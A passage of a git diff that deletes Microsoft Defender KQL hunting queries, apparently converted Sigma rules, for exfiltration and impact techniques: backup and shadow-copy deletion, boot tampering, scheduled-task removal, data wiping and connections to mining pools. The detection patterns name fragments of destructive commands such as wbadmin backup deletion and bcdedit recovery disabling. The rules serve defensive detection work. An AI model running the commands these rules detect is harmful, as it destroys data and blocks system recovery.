(@beardofbinary) - NCC Group -// Date: 2021/05/26 -// Level: medium -// Description: Detects Rclone config files being created -// Tags: attack.exfiltration, attack.t1567.002 -DeviceFileEvents -| where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\" \ No newline at end of file diff --git a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql b/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql deleted file mode 100644 index b9fb4ee4..00000000 --- a/Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/07 -// Level: critical -// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations -// Tags: attack.exfiltration -DeviceProcessEvents -| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\" \ No newline at end of file diff --git a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql b/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql deleted file mode 100644 index 6be1dff3..00000000 --- a/Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/16 -// Level: high -// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers -// Tags: attack.exfiltration, attack.t1048 -DeviceProcessEvents -| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\") \ No newline at end of file diff --git a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql deleted file mode 100644 index 4e2e05ff..00000000 --- a/Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql +++ /dev/null 
@@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023/03/16 -// Level: high -// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 - -// Tags: attack.exfiltration, attack.t1048.003, cve.2023.23397 -DeviceProcessEvents -| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254."))) \ No newline at end of file diff --git a/Exfiltration/Tap_Installer_Execution.kql b/Exfiltration/Tap_Installer_Execution.kql deleted file mode 100644 index 011f6fd3..00000000 --- a/Exfiltration/Tap_Installer_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques -// Tags: attack.exfiltration, attack.t1048 -DeviceProcessEvents -| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\"))) \ No newline at end of file diff --git a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql b/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql deleted file mode 100644 index d71f9266..00000000 --- a/Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". -This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). - -// Tags: attack.exfiltration, attack.t1048.003 -DeviceProcessEvents -| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql deleted file mode 100644 index 5a91ee73..00000000 --- a/Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/23 -// Level: high -// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. -// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql b/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql deleted file mode 100644 index 3de1df11..00000000 --- a/Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql +++ /dev/null 
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: high
-// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Impact/Backup_Files_Deleted.kql b/Impact/Backup_Files_Deleted.kql
deleted file mode 100644
index 742c161c..00000000
--- a/Impact/Backup_Files_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/02
-// Level: medium
-// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
-// Tags: attack.impact, attack.t1490
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk")
\ No newline at end of file
diff --git a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql b/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index e80b818d..00000000
--- a/Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set"
\ No newline at end of file
diff --git a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql b/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql
deleted file mode 100644
index 0697d1a3..00000000
--- a/Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021/08/09
-// Level: high
-// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/Impact/Delete_All_Scheduled_Tasks.kql b/Impact/Delete_All_Scheduled_Tasks.kql
deleted file mode 100644
index 4b16c868..00000000
--- a/Impact/Delete_All_Scheduled_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/Delete_Important_Scheduled_Task.kql b/Impact/Delete_Important_Scheduled_Task.kql
deleted file mode 100644
index a382f4fb..00000000
--- a/Impact/Delete_Important_Scheduled_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql b/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql
deleted file mode 100644
index 24179601..00000000
--- a/Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/26
-// Level: medium
-// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
-Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
-Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
-
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe")
\ No newline at end of file
diff --git a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql b/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql
deleted file mode 100644
index 508f1f42..00000000
--- a/Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/20
-// Level: high
-// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy"
\ No newline at end of file
diff --git a/Impact/Disable_Important_Scheduled_Task.kql b/Impact/Disable_Important_Scheduled_Task.kql
deleted file mode 100644
index b31674ee..00000000
--- a/Impact/Disable_Important_Scheduled_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/26
-// Level: high
-// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 230b30d6..00000000
--- a/Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects the recovery of files from backups via "wbadmin.exe".
-Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Impact/Fsutil_Suspicious_Invocation.kql b/Impact/Fsutil_Suspicious_Invocation.kql
deleted file mode 100644
index a4ffc9ee..00000000
--- a/Impact/Fsutil_Suspicious_Invocation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ecco, E.M. Anhaus, oscd.community
-// Date: 2019/09/26
-// Level: high
-// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
-Might be used by ransomwares during the attack (seen by NotPetya and others).
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485
-DeviceProcessEvents
-| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
deleted file mode 100644
index 815998df..00000000
--- a/Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: high
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
deleted file mode 100644
index c3b92be9..00000000
--- a/Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: low
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql b/Impact/Network_Communication_With_Crypto_Mining_Pool.kql
deleted file mode 100644
index 1428996b..00000000
--- a/Impact/Network_Communication_With_Crypto_Mining_Pool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/10/26
-// Level: high
-// Description: Detects initiated network connections to crypto mining pools
-// Tags: attack.impact, attack.t1496
-DeviceNetworkEvents
-| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks",
"minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", 
"us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru")
\ No newline at end of file
diff --git a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql b/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql
deleted file mode 100644
index ef325b09..00000000
--- a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: medium
-// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
-// Tags: attack.impact, attack.t1490
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates") and RegistryKey endswith "\\Blob"
\ No newline at end of file
diff --git a/Impact/Portable_Gpg.EXE_Execution.kql b/Impact/Portable_Gpg.EXE_Execution.kql
deleted file mode 100644
index a096491b..00000000
--- a/Impact/Portable_Gpg.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/06
-// Level: medium
-// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\")))
\ No newline at end of file
diff --git a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
deleted file mode 100644
index 3f12168b..00000000
--- a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/22
